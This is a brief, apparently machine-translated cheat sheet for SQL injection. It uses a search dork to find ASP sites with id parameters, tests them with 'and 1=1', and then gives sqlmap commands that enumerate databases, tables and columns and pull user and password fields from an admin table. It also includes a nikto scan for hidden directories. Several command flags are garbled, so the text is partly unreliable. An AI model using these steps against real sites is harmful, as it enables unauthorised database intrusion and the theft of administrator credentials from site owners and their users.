Baidu ** inurl:asp?id= find such as www.abc.asp?id=1
Simply judge whether there is a leak www.abc.asp?id=1, www.abc.asp?id=1 and 1=1
kali View all databases sqlmap -u www.abc.asp?id=1 -- dbs -current-user
There will be corresponding information if there is a vulnerability
View all tables sqlmap -u www.abc.asp?id=1 -dbms mysql -D database name --tables (-D database name can be omitted, all databases are displayed)
View the columns of the specified table sqlmap -u www.abc.asp?id=1 -dbms mysql -D database name -T admin --columns
View the specified content sqlmap -u www.abc.asp?id=1 -dbms mysql -D database name -T admin -C user,pwd
nikto query page hidden directory nikto -host www.abc.com